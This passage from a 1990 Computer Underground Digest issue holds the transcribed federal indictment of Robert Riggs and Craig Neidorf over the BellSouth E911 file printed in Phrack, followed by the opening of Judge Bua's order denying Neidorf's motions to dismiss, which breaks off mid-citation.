4. _Text File_ - As used here, a "file" is a collection of
related data records treated as a unit by a computer and stored in
a computer's memory on a disk or other permanent storage device.
A "text file" is a collection of stored data, which, when recovered
from a disk or other storage device, presents typed English
characters displayed on a computer monitor, a printer or in any
other display medium compatible with the computer storing the data.
5. _Computer Hackers_ - As used here, computer hackers are
individuals involved with the unauthorized access of computer
systems by various means. Computer hackers commonly identify
themselves by aliases or "hacker handles" when communicating with
other hackers.
[page] 2
6. _Legion of Doom_ - As used here the Legion of Doom (LOD)
was a closely knit group of computer hackers involved in:
a. Disrupting telecommunications by entering
computerized telephone switches and changing the
routing on the circuits of the computerized
switches.
b. Stealing proprietary computerized information from
companies and individuals.
c. Stealing and modifying credit information on individuals
maintained in credit bureau computers.
d. Fraudulently obtaining money and property from
companies by altering the computerized information
used by the companies.
e. Sharing information with respect to their methods
of attacking computers with other computer hackers
in an effort to avoid law enforcement agencies and
telecommunication experts from focusing on them, alone.
7. _Bulletin Board System_ - At all times relevant herein, a
bulletin board system (BBS) was a computer, or portion thereof,
operated as a medium of communication between computer users at
different locations. Users accessed or got on the BBS through
telephone line link ups from the user's computer to the BBS
computer, which could be in the same building or around the world.
BBS's could be used to exchange messages (electronic mail) or store
[page] 3
information. BBS's were public commercial services or privately
operated.
8. _JOLNET BBS_ - At all times relevant herein, a public access
computer bulletin board system was located in Lockport, Illinois,
which provided computer storage space and electronic mail service
to its users. The Lockport BBS was called "Jolnet". The Jolnet
BBS was also used by computer hackers as a location for
exchanging and developing software tools for computer intrusion,
and for receiving and distributing hacker tutorials and other
computer access information.
9. _E-Mail_ - At all time relevant herein, electronic mail
(e-mail) was a computerized method for sending communications and
computer files between computers on various computer networks.
Persons who sent or received e-mail were identified by an e-mail
address, similar to a postal address. Although a person may have
more than one e-mail address, each e-mail address identified a person
uniquely. The message header of an e-mail message identified both
the sender and recipient of the e-mail message and the date the
message was sent.
_DEFENDANTS_
10. At all times relevant herein ROBERT J. RIGGS, defendant
herein, was a member of the LOD.
11. At all time relevant herein, CRAIG NEIDORF, defendant herein,
was a publisher and editor of a computer hacker newsletter known as
"PHRACK". He disseminated this newsletter by sending it so those
individuals on the mailing list.
[page] 4
12. Beginning in or about February, 1988 and continuing until the
return date of this indictment, at Lockport, In the Northern
District of Illinois, Eastern Division, and elsewhere,
ROBERT J. RIGGS, also known
as Robert Johnson, also
known as Prophet, and
CRAIG NEIDORF, also known
as Knight Lightning,
defendants herein, together with others known and unknown to the
Grand Jury, devised and intended to devise and participated in a
scheme and artifice to obtain property by means of false and
fraudulent pretenses and representations, well knowing at the time
that such pretenses and representations were false and fraudulent when
made.
_OBJECT OF FRAUD SCHEME_
13. The object of the defendants' scheme was to fraudulently
obtain and steal private property in the form of computerized files
by gaining unauthorized access to other individuals' and corporations'
computers, copying the sensitive computerized files in those
computers, and then publishing the information from the computerized
files in a hacker publication for dissemination to other computer
hackers.
_OPERATION OF THE FRAUD SCHEME_
14. It was part of the fraud scheme that the defendant NEIDORF
would and did solicit information about how to illegally access
computers and telecommunications systems from computer hackers,
including the defendant RIGGS.
[page] 5
15. It was further part of the scheme that between about
February, 1988 and Novemeber, 1988 the defendant RIGGS would and did
fraudulently obtain sensitive proprietary Bell South information
files including the E911 text file by gaining remote unauthorized
access to computers of the Bell South.
16. It was further part of the scheme that the defendant RIGGS
would and did disguise and conceal and did attempt to disguise
and conceal the theft of the E911 text file from Bell South by
removing all indications of his unauthorized access into Bell
South computers and by using account codes of legitimate Bell
South users to disguise his unauthorized use of the Bell South
computer.
17. It was further part of the scheme that between about
February, 1988 and November 23, 1988 [transcribers note: copy
illegible at this point, year could be 1989], RIGGS would and did
transfer in interstate commerce the fraudulently obtained E911 text
file from Decatur, Georgia to Lockport, Illinois through the use of
an interstate computer data network.
18. It was further part of the scheme that defendant RIGGS would
and did store the stolen E911 text file on a computer bulletin board
system in Lockport, Illinois under the name Robert Johnson, as alias
he used to conceal his true identity.
19. It was further part of the scheme that between about October,
1988 and January 23, 1989 defendant NEIDORF, utilizing a computer at
the University of Missouri in Columbia, Missouri would and did
receive a copy of the stolen E911 text file from defendant RIGGS
through the lockport computer bulletin board system through the use
of an interstate computer network.
[page] 6
20. It was further part of the scheme that defendant NEIDORF
would and did edit and retype the E911 text file at the request of
the defendant RIGGS in an attempt to conceal the fact that Bell
South's computer system had been entered by RIGGS without authority
and that RIGGS had fraudulently obtained the E911 text file in order
to convert Bell South's private and proprietary text file and the
information it contained therein to the defendants' own use and the
use of others and to prepare it for dissemination and disclosure in
the computer newsletter, "Phrack".
21. It was further part of the scheme that on or about January
23, 1989, defendant NEIDORF would and did transfer an edited version
of the stolen E911 test file through the use of an interstate
computer data network from his computer at the University of Missouri
to the computer bulletin board system used by defendant RIGGS in
Lockport, Illinois.
22. It was further part of the scheme that on or about February
24, 1989 defendant NEIDORF disseminated the disguised E911 text file
in issue 24 of "PHRACK" newsletter.
23. It was further part of the scheme that the defendant NEIDORF
would disseminate and disclose this information to others for their
own use, including to other computer hackers who could use it to
illegally manipulate the emergency 911 computer systems in the United
States and thereby disrupt or halt 911 service in portions of the
United States.
24. It was further part of the scheme that the defendants used
aliases, coded language and other means to avoid detection and
[page] 7
apprehension by law enforcement authorities and to otherwise provide
security to the members of the fraud scheme.
25. It was further a part of the scheme that the defendants would
and did misrepresent, conceal, and hide, and cause to be
misrepresented, concealed and hidden the purposes of the acts done in
furtherance of the fraud scheme.
26. Between in or about February, 1988 and Novemeber, 1988,
at Lockport, in the Northern District of Illinois, Eastern Division,
and elsewhere,
ROBERT J. RIGGS, also known
as Robert Johnson, also
known as Prophet,
defendant herein, for the purpose of executing the aforesaid scheme,
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce from Decatur, Georgia
to Lockport, Illinois, certain signs, signals and sounds, namely: a
data transfer of Bell South E911 Standard Practice test file dated
March, 1988 (as further defined in paragraph 3 of this Count of this
Indictment).
In violation of Title 18, United States Code, Section 1343.
[page] 8
_COUNT TWO_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. On or about July 23, [transcribers note: date illegible in
copy] 1988, at Lockport, in the Northern District of Illinois,
Eastern Division and elsewhere,
CRAIG NEIDORF, also known
as Knight Lightning,
defendant herein, for the purposes of executing the aforesaid scheme
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce from Columbia,
Missouri to Lockport, Illinois certain signs, signals and sounds,
namely: a data transfer of Phrack World News announcing the
beginning of the "Phoenix Project";
In violation of Title 18, United States code [sic] , Section 1343
[page] 9
_COUNT THREE_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. On or about September 19, 1988, at Lockport, in the Northern
District of Illinois, Eastern Division and elsewhere,
CRAIG NEIDORF, also known
as Knight Lightning,
defendant herein, for the purposes of executing the aforesaid scheme
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce from Columbia,
Missouri to Lockport, Illinois certain signs, signals and sounds,
namely: a data transfer of E-mail from defendant NEIDORF to
defendant RIGGS and "Scott C."
In violation of Title 18, United States code [sic] , Section 1343
[page] 10
_COUNT FOUR_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. On or about September 29, 1988, at Lockport, in the Northern
District of Illinois, Eastern Division and elsewhere,
ROBERT J. RIGGS, also known
as Robert Johnson, also
known as Prophet, and
CRAIG NEIDORF, also known
as Knight Lightning,
defendants herein, for the purposes of executing the aforesaid scheme
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce from Lockport,
Illinois to Columbia, Missouri certain signs, signals and sounds,
namely: a data transfer of E-mail from the defendant RIGGS to the
defendant NEIDORF;
In violation of Title 18, United States Code , Section 1343
[page] 11
_COUNT FIVE_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. Between in or about October, 1988 and January 23, 1989 at
Lockport, in the Northern District of Illinois, Eastern Division and
elsewhere,
ROBERT J. RIGGS, also known
as Robert Johnson, also
known as Prophet, and
CRAIG NEIDORF, also known
as Knight Lightning,
defendants herein, for the purposes of executing the aforesaid scheme
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce [sic] Lockport,
Illinois to Columbia, Missouri certain signs, signals and sounds,
namely: a data transfer of Bell South's E911 Practice text file
dated March, 1988 (as further defined in paragraph 3 of Count One of
this Indictment) from defendant RIGGS to defendant NEIDORF;
In violation of Title 18, United States Code , Section 1343
[page] 12
_COUNT SIX_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. Between in or about October, 1988 and January 23, 1989 at
Lockport, in the Northern District of Illinois, Eastern Division and
elsewhere,
ROBERT J. RIGGS, also known
as Robert Johnson, also
known as Prophet, and
CRAIG NEIDORF, also known
as Knight Lightning,
defendants herein, for the purposes of executing the aforesaid scheme
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce from Lockport, Illinois
to Columbia, Missouri a computerized text file with a value of $5,000
or more, namely:
A Bell South Standard Practice (BSP) 660-225-104SV- Control
Office Administration of Enhanced 911 Services for Special
Services and Major Account Centers dated March, 1988, valued at
approximately $23,900.00;
the defendants then and there knowing the same to have been stolen,
converted, and taken by fraud;
In violation of Title 18, United States code [sic] , Section 2314
[page] 13
_COUNT SEVEN_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. Between in or about December 23 1988, at Lockport, in the
Northern District of Illinois, Eastern Division and elsewhere,
CRAIG NEIDORF, also known
as Knight Lightning,
defendant herein, for the purposes of executing the aforesaid scheme
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce from Columbia,
Missouri to Lockport, Illinois certain signs, signals and sounds,
namely: a data transfer of Phrack Newsletter, Issue 22, Files 1, 4,
5 and 6;
In violation of Title 18, United States Code , Section 1343
[page] 14
_COUNT EIGHT_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. Between in or about January 23, 1988 at Lockport, in the
Northern District of Illinois, Eastern Division and elsewhere,
ROBERT J. RIGGS, also known
as Robert Johnson, also
known as Prophet, and
CRAIG NEIDORF, also known
as Knight Lightning,
defendants herein, for the purposes of executing the aforesaid scheme
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce from Columbia,
Missouri to Lockport, Illinois certain signs, signals and sounds,
namely: a data transfer of an edited Bell South E911 Standard
Practice text file dated March, 1988 (as further defined in paragraph
3 of Count One of this Indictment);
In violation of Title 18, United States Code , Section 1343
[page] 15
_COUNT NINE_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. On or about July 23, 1988, at Lockport, in the Northern
District of Illinois, Eastern Division and elsewhere,
ROBERT J. RIGGS, also known
as Robert Johnson, also
known as Prophet, and
CRAIG NEIDORF, also known
as Knight Lightning,
defendants herein, did transmit and cause to be transmitted by means
of a wire and radio communication in interstate commerce from
Columbia, Missouri to Lockport, Illinois, a computerized text file
with a value of $5,000 or more, namely:
An edited Bell South Standard Practice (BSP) 660-225-104SV-
Control Office Administration of Enhanced 911 Services for
Special Services and Major Account Centers dated March, 1988,
valued at approximately $23,900.00;
the defendants, then and there knowing the same to have been stolen,
converted, and taken by fraud;
In violation of Title 18, United States Code , Section 2314.
[page] 16
_COUNT TEN_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as fully set forth herein.
2. On or about February 23, 1988, at Lockport, in the Northern
District of Illinois, Eastern Division and elsewhere,
CRAIG NEIDORF, also known
as Knight Lightning,
defendant herein, for the purposes of executing the aforesaid scheme
did knowingly transmit and cause to be transmitted by means of a wire
and radio communication in interstate commerce from Columbia,
Missouri to Lockport, Illinois certain signs, signals and sounds,
namely: a data transfer of Phrack Newsletter, Issue 24, including an
edited Bell South Standard Practice (BSP) 660-225-104SV- Control
Office Administration of Enhanced 911 Services for Special Services
and Major Account Centers dated March, 1988;
In violation of Title 18, United States Code , Section 1343
[page] 17
_COUNT ELEVEN_
The SPECIAL APRIL 1990 GRAND JURY further charges:
1. The Grand Jury realleges and incorporates by reference the
allegations of paragraphs 1 through 25 of Count One of this
Indictment as though fully set forth herein.
2. On or about February 24, 1989, at Lockport, in the Northern
District of Illinois, Eastern Division and elsewhere,
ROBERT J. RIGGS, also known
as Robert Johnson, also
known as Prophet, and
CRAIG NEIDORF, also known
as Knight Lightning,
defendants herein, did transport and cause to be transported in
interstate commerce from Columbia, Missouri to Lockport, Illinois, a
computerized text file with a value of $5,000 or more namely:
A Bell South Standard Practice (BSP) 660-225-104SV- Control Office
Administration of Enhanced 911 Services for Special Services and
Major Account Centers dated March, 1988, valued at approximately
$23,900.00;
the defendants, then and there knowing the same to have been stolen,
converted, and taken by fraud;
In violation of Title 18, United States code [sic] , Section 2314
A TRUE BILL:
_________________________________
F O R E P E R S O N
___________________________________
UNITED STATES ATTORNEY
[page] 18
[transcribed from FAXed copy 6/14/90. GRM]
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
+ END CuD, #1.15 +
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+===+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
!
--
Si
Si_Druid
****************************************************************************
>C O M P U T E R U N D E R G R O U N D<
>D I G E S T<
*** Volume 1, Issue #1.16 (June 19, 1990) **
** SPECIAL ISSUE: JUDGE BUA'S OPINION ON MOTION TO DISMISS **
****************************************************************************
MODERATORS: Jim Thomas / Gordon Meyer
REPLY TO: TK0...@NIU.bitnet
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views.
--------------------------------------------------------------------
DISCLAIMER: The views represented herein do not necessarily represent the
views of the moderators. Contributors assume all responsibility
for assuring that articles submitted do not violate copyright
protections.
--------------------------------------------------------------------
The defense in Craig Neidorf's case filed several motions on his
behalf, but all were dismissed by the presiding judge, Nicholas Bua.
Emmanuel Goldstein of 2600 MAGAZINE provided the following
transcript of the opinion.
----------------------------------
UNITED STATES DISTRICT COURT
NORTHERN DISTRICT OF ILLINOIS
EASTERN DIVISION
UNITED STATES OF AMERICA, )
)
Plaintiff, )
) No. 90 CR 0070
v. ) Hon. Nicholas J. Bua,
) Presiding
ROBERT J. RIGGS, also )
known as Robert Johnson, )
CRAIG NEIDORF, also known )
as Knight Lightning, )
)
Defendants. )
MEMORANDUM ORDER
Over the course of the past decade, advances in technology and growing
respect and acceptance for the powers of computers have created a true
explosion in the computer industry. Quite naturally, the growth of computer
availability and application has spawned a host of new legal issues. This
case requires the court to wrestle with some of these novel legal issues
which are a product of the marriage between law and computers.
The indictment charges that defendants Robert J. Riggs and Craig
Neidorf, through the use of computers, violated the federal wire fraud
statute, 18 U.S.C. 1343, and the federal statute prohibiting interstate
transportation of stolen property, 18 U.S.C. 2314. Neidorf argues that the
wire fraud statute and the statute prohibiting interstate transportation of
stolen property do not apply to the conduct with which he is charged.
Therefore, he has moved to dismiss the charges against him, as set forth in
Counts II-IV of the indictment, which are based on those statutes. {The
current indictment also contains three counts -- V, VI, and VII -- which
set forth charges against Neidorf for violations of 1030(a)(6)(A) of the
Computer Fraud and Abuse Act of 1986, 18 U.S.C. 1030(a)(6)(A). Although
Neidorf also moves to dismiss those counts, the government has indicated
that it is in the process of drafting a superseding indictment which may
not contain any charges under the Computer Fraud and Abuse Act of 1986.
Therefore, the court will reserve its ruling on Neidorf's motion to dismiss
Counts V, VI, and VII until the superseding indictment is filed. The court
will also reserve its ruling on Neidorf's motion for a bill of particulars,
which by its terms pertains only to Counts V, VI, and VII.} Neidorf has
also filed various other pretrial motions. For the reasons stated herein,
Neidorf's motions are denied.
I. THE INDICTMENT
A. Factual Allegations
In about September 1988, Neidorf and Riggs devised and began
implementing a scheme to defraud Bell South Telephone Company ("Bell
South"), which provides telephone services to a nine-state region including
Alabama, Georgia, Mississippi, Tennessee, Kentucky, Louisiana, North
Carolina, South Carolina, and Florida. The objective of the fraud scheme
was to steal Bell South's computer text file {A "computer text file" is a
collection of stored data which, when retrieved from a disk or other
computer storing device, presents typed English characters on a computer
monitor, a printer, or other medium compatible with the computer storing
the data.} which contained information regarding its enhanced 911 (E911)
system for handling emergency calls to policy <sic>, fire, ambulance, and
other emergency services in municipalities. The text file which Riggs and
Neidorf planned to steal specifically details the procedures for
installation, operation, and maintenance of E911 services in the region in
which Bell South operates. Bell South considered this file to contain
valuable proprietary information and, therefore, closely guarded the
information from being disclosed outside of Bell South and its
subsidiaries. Riggs and Neidorf wanted to obtain the E911 text file so it
could be printed in a computer newsletter known as "PHRACK" which Neidorf
edited and published.
In about December 1988, Riggs began the execution of the fraud scheme
by using his home computer in Decatur, Georgia, to gain unlawful access to
Bell South's computer system located at its corporate headquarters in
Atlanta, Georgia. After gaining access to Bell South's system, Riggs
"downloaded" {"Downloading" is the process of transferring files, programs,
or other computer-stored information from a remote computer to one's own
computer. See Note, COMPUTER BULLETIN BOARD OPERATOR LIABILITY FOR USER
MISUSE, 54 Fordham L. Rev. 439, 439 n.2 (1988). "Uploading" is the reverse
process, i.e., transferring computer-stored data from one's own computer to
a remote computer. Id.} the text file, which described in detail the
operation of the E911 system in Bell South's operating region. Riggs then
disguised and concealed his unauthorized access to the Bell South system by
using account codes of persons with legitimate access to the E911 text
file.
Pursuant to the scheme he had devised with Neidorf, Riggs then
transferred the stolen computer text file to Neidorf by way of an
interstate computer data network. Riggs stored the stolen text file on a
computer bulletin board system {A computer bulletin board system is a
computer program that simulates an actual bulletin board by allowing
computer users who access a particular computer to post messages, read
existing messages, and delete messages. The messages exchanged may contain
a wide variety of information, including stolen credit card numbers,
confidential business information, and information about local community
events. See Note, COMPUTER BULLETIN BOARD OPERATOR LIABILITY FOR USER
MISUSE, 54 Fordham L. Rev. 439, 439-41 & nn.1-11 (1988); see also Jensen,
AN ELECTRONIC SOAP BOX: COMPUTER BULLETIN BOARDS AND THE FIRST AMENDMENT,
39 Fed. Com. L.J. 217 (1987); Morrison, ELECTRONIC BULLETIN BOARD SYSTEM
PROYER BBS, 13 Legal Econ. 44 (1987); Soma, Smith, & Sprague, LEGAL
ANALYSIS OF ELECTRONIC BULLETIN BOARD ACTIVITIES, 7 W. New Engl. L.Rev. 571
(1985).} located in Lockport, Illinois, so as to make the file available to
Neidorf. The Lockport bulletin board system was used by computer "hackers"
{For a discussion of the definition of "hackers," see Part II, Subpart C,
infra.} as a location for exchanging and developing software tools and
other information which could be used for unauthorized intrusion into
computer systems. Neidorf, a twenty-year-old student at the University of
Missouri in Columbia, Missouri, used a computer located at his school to
access the Lockport computer bulletin board and thereby receive the Bell
South E911 text file from Riggs. At the request of Riggs, Neidorf then
edited and retyped the E911 text file in order to conceal the fact that it
had been stolen from Bell South. Neidorf then "uploaded" {See supra note
2.} his revised version of the stolen file back onto the Lockport bulletin
board system for Riggs' review. To complete the scheme, in February 1989,
Neidorf published his edited edition of Bell South's E911 text file in his
PHRACK newsletter.
B. Charges
The current indictment asserts seven counts. Count I charges that
Riggs committed wire fraud in violation of 18 U.S.C. 1343 by transferring
the E911 text file from his home computer in Decatur, Georgia to the
computer bulletin board system in Lockport, Illinois. Count II charges both
Riggs and Neidorf with violating 1343 by causing the edited E911 file to be
transferred from a computer operated by Neidorf in Columbia, Missouri, to
the computer bulletin board system in Lockport, Illinois. Counts III and IV
assert that by transferring the E911 text file via an interstate computer
network, Riggs and Neidorf violated the National Stolen Property Act, 18
U.S.C. 2314, which prohibits interstate transfer of stolen property.
Finally, Counts V-VII charge Riggs and Neidorf with violating 1030(a)(6)(A)
of the Computer Fraud and Abuse Act of 1986, 18 U.S.C. 1030(a)(6)(A), which
prohibits knowingly, and with intent to defraud, trafficking in information
through which a computer may be accessed without authorization.
II. DISCUSSION
A. Motion to Dismiss Count II
Neidorf claims that Count II of the indictment is defective because it
fails to allege a scheme to defraud, one of the necessary elements for a
wire fraud claim under 18 U.S.C. 1343. See LOMBARDO V. UNITED STATES, 865
F.2d 155, 157 (7th Cir.) (holding that the two elements of a wire fraud
claim under 1343 are a scheme to defraud and the use of wire communications
in furtherance of the scheme), CERT. DENIED, 109 S.Ct. 3186 (1989). All
Count II charges, says Neidorf, is that he received and then transferred a
computer text file, not that he participated in any scheme to defraud.
Unsurprisingly, Neidorf's reading of the indictment is self-servingly
narrow. The indictment plainly and clearly charges that Neidorf and Riggs
concocted a fraud scheme, the object of which was to steal the E911 text
file from Bell South and to distribute it to others via the PHRACK
newsletter. The indictment also clearly alleges that both Riggs and Neidorf
took action in furtherance of the fraud scheme. Riggs allegedly used
fraudulent means to access Bell South's computer system and then disguised
his unauthorized entry. Neidorf allegedly furthered the scheme by redacting
from the E911 text file references to Bell South and other information
which would reveal the source of the E911 file, transmitting the redacted
file back to the Lockport bulletin board for Riggs review, and publishing
the redacted text file in the PHRACK newsletter for others' use. Moreover,
both Neidorf and Riggs allegedly used coded language, code names, and other
deceptive means to avoid the detection of their fraud by law enforcement
officials. These allegations sufficiently set forth the existence of a
scheme to defraud, as well as Neidorf's participation in the scheme. See
MCNALLY V. UNITED STATES, 483 U.S. 350, 358 (1987) (where the Court,
quoting HAMMERSCHMIDT V. UNITED STATES, 265 U.S. 182, 188 (1924), held that
"to defraud" as used in the mail fraud statute simply means "wronging one
in his property rights by dishonest methods or schemes" usually by "the
deprivation of something of value by trick, deceit, chicane, or
overreaching"); see also CARPENTER V. UNITED STATES, 108 S.Ct. 316, 320-21
(1987) (applying MCNALLY to the wire fraud statute, the Court held that a
Wall Street Journal columnist participated in a scheme to defraud
chargeable under 1343 where he executed a plan under which he disclosed
confidential financial information to an investor in exchange for a share
of the investor's profits from that information).
Neidorf also argues that Count II is deficient because it fails to
allege that he had a fiduciary relationship with Bell South. To support
this position, Neidorf relies on cases such as UNITED STATES V. RICHTER,
610 F. Supp. 480 (N.D. Ill. 1985), and UNITED STATES V. DORFMAN, 532
F.Supp. 1118 (1981). In each of those cases, as well as other similar cases
cited by Neidorf, the court held that where a wire fraud charge is based on
the deprivation of an intangible right, such as the right to honest and
fair government or the right to the loyal service of an employee, the
government must allege the existence of a fiduciary relationship between
the defendant and the alleged victim to state a charge under 1343.
In the instant case, however, the wire fraud charge is not based on
the deprivation of an intangible right. The government charges Riggs and
Neidorf with scheming to defraud Bell South out of PROPERTY -- the
confidential information contained in the E911 text file. The indictment
specifically alleges that the object of defendants' scheme was the E911
text file, which Bell South considered to be valuable, proprietary,
information. The law is clear that such valuable, confidential information
is "property," the deprivation of which can form the basis of a wire fraud
charge under 1343. See CARPENTER, 108 S.Ct. at 320; see also KEANE V.
UNITED STATES, 852 F.2d 199, 205 (7th Cir.), CERT. DENIED, 109 S.Ct. 2109
(1989). Therefore, Neidorf's argument misconstrues the wire fraud charge
against him. Cases such as RICHTER and DORFMAN are wholly inapposite.
{Moreover, to the extent that prior case law such as DORFMAN and RICHTER
held that a mail fraud or a wire fraud charge can be based on the
deprivation of intangible rights so long as a fiduciary relationship exists
between the victim and the defendant, those cases are no longer good law.
The Supreme Court expressly rejected the notion that such a charge can be
based on the deprivation of an intangible right -- fiduciary relationship
or not -- in MCNALLY V. UNITED STATES, 483 U.S. 350 (1987). See CARPENTER
V. UNITED STATES, 108 S.Ct. 316, 320 (1987). The MCNALLY Court ruled that a
mail fraud charge must be based on the deprivation of PROPERTY. Id.
However, the property which forms the basis for a wire fraud or mail fraud
charge can be "intangible" property. See BATEMAN V. UNITED STATES, 875 F.2d
1304, 1306 & n.2 (7th Cir. 1989); see also UNITED STATES V. BARBER, 881
F.2d 345, 348 (7th Cir. 1989), CERT. DENIED, 109 L.Ed. 318 (1990). This
distinction between intangible property and intangible rights has somewhat
muddled the ruling in MCNALLY. Id.}
As further support for his argument that fiduciary relationship
between himself and Bell South must be alleged to state a wire fraud charge
against him, Neidorf analogizes his role in the alleged scheme to that of
an "innocent tippee" in the securities context, such as the defendants in
DIRKS V. SECURITIES EXCHANGE COMMISSION, 463 U.S. 646 (1983), and CHIARELLA
V. UNITED STATES, 445 U.S. 222 (1980). This analogy, however, is
fallacious. Those cases involved individuals who come upon information
LAWFULLY; the question in each of those cases was whether, once possessing
that information, the individual had a duty to disclose it. In the instant
case, in contrast, Neidorf is alleged to have planned and participated in
the scheme to defraud Bell South. Although Riggs allegedly was the one who
actually stole the E911 text file from Bell South's computer system, the
government alleges that Neidorf was completely aware of Riggs' activities
and agreed to help Riggs conceal the theft to make the fraud complete.
Therefore, in no way can Neidorf be construed as being in a similar
situation to the innocent tippees in DIRKS and CHIARELLA. {Similarly, the
case of UNITED STATES V. CHESTERMAN, No. 89-1276 (2d Cir. May 2, 1990),
which Neidorf submitted to the court in a supplemental brief, does not lend
any support to Neidorf's position.} As a result, the court rejects his
argument that Count II is defective for failing to allege a fiduciary duty
between himself and Bell South. Neidorf's motion to dismiss Count II is
accordingly denied.
B. Motion to Dismiss Counts III and IV
Counts III and IV charge Riggs and Neidorf with violating 18 U.S.C.
2314, which provides, in relevant part: "Whoever transports, transmits, or
transfers in interstate or foreign commerce any goods, wares, merchandise,
securities or money, of the value of $5000 or more, knowing the same to
have been stolen, converted or taken by fraud . . . [s]hall be fined not
more than $10,000 or imprisoned not more than ten years, or both." The
government concedes that charging Neidorf under 2314 plots a course on
uncharted waters. No court has ever held that the electronic transfer of
confidential, proprietary business information from one computer to another
across state lines constitutes a violation of 2314. However, no court has
addressed the issue. Surprisingly, despite the prevalence of
computer-related crime, this is a case of first impression. The government
argues that reading 2314 as covering Neidorf's conduct in this case is a
natural adaptation of the statute to modern society. Conversely, Neidorf
contends that his conduct does not fall within the purview of 2314 and that
the government is seeking an unreasonable expansion of the statute. He
urges the court to dismiss the charge on two grounds.
Neidorf's first argument is that the government cannot sustain a 2314
charge in this case because the only thing which he allegedly caused to be
transferred across state lines was "electronic impulses." Neidorf maintains
that under the plain language of the statute, this conduct does not come
within the scope of 2314 since electronic impulses do not constitute
"goods, wares, or merchandise."
The court is unpersuaded by Neidorf's disingenuous argument that he
merely transferred electronic impulses across state lines. Several courts
have upheld 2314 charges based on the wire transfer of fraudulently
obtained money, rejecting the arguments of the defendants in those cases
that only electronic impulses, not actual money, crossed state lines. For
example, in UNITED STATES V. GILBOE, 684 F.2d 235 (2d Cir. 1982), CERT.
DENIED, 459 U.S. 1201 (1983), the court held, in affirming a 2314
conviction based on the wire transfer of funds: "The question whether
[2314] covers electronic transfers of funds appears to be one of first
impression, but we do not regard it as a difficult one. Electronic signals
in this context are the means by which funds are transported. The beginning
of the transaction is money in one account and the ending is money in
another. The manner in which the funds were moved does not affect the
ability to obtain tangible paper dollars or a bank check from the receiving
account. If anything, the means of transfer here were essential to the
fraudulent scheme." Id. at 238. Other circuits have followed the reasoning
in GILBOE. See UNITED STATES V. KROH, 896 F.2d 1524, 1528-29 (8th Cir.
1990); UNITED STATES V. GOLDBERG, 830 F.2d 459, 466-67 (3d Cir. 1987);
UNITED STATES V. WRIGHT, 791 F.2d 133, 135-37 (10th Cir. 1986); see also
UNITED STATES V. KENNGOTT, 840 F.2d 375, 380 (7th Cir. 1987) (citing GILBOE
with approval). In all of these cases, the courts held that money was
transferred across state lines within the meaning of 2314 because funds
were actually accessible in one account prior to the transfer, and those
funds were actually accessible in an out-of-state account after the
transfer. The courts refused to accept the superficial characterization of
the transfers as the mere transmittal of electronic impulses.
Similarly, in the instant case, Neidorf's conduct is not properly
characterized as the mere transmission of electronic impulses. Through the
use of his computer, Neidorf allegedly transferred proprietary business
information -- Bell South's E911 text file. Like the money in the case
dealing with wire transfers of funds, the information in the E911 text file
was accessible at Neidorf's computer terminal in Missouri before he
transferred it, and the information was also accessible at the Lockport,
Illinois computer bulletin board after Neidorf transferred it. Therefore,
under GILBOE, KROH, WRIGHT, and GOLDBERG, the mere fact that the
information actually crossed state lines via computer-generated electronic
impulses does not defeat a charge under 2314.
The question this case presents, then, is not whether electronic
impulses are "goods, wares, or merchandise" within the meaning of 2314, but
whether the proprietary information contained in Bell South's E911 text
file constitutes a "good, ware, or merchandise" within the purview of the
statute. This court answers that question affirmatively. It is well-settled
that when proprietary business information is affixed to some tangible
medium, such as a piece of paper, it constitutes "goods, wares, or
merchandise" within the meaning of 2314. See UNITED STATES V. GREENWALD,
479 F.2d 320, 322 (6th Cir.) (documents containing valuable chemical
formulae are "goods, wares, or merchandise" under 2314), CERT. DENIED, 414
U.S. 854 (1973); UNITED STATES V. BOTTONE, 365 F.2d 389, 393 (2d Cir.)
(copies of documents describing a manufacturing process of patented drugs
constitute a "good" under 2314), CERT. DENIED, 385 U.S. 974 (1966); UNITED
STATES V. LESTER, 282 F.2d 750, 754-55 (3d Cir. 1960) (copies of
geophysical maps identifying oil deposits come within the purview of 2314),
CERT. DENIED, 364 U.S. 937 (1961); UNITED STATES V. SEAGRAVES, 265 F.2d 876
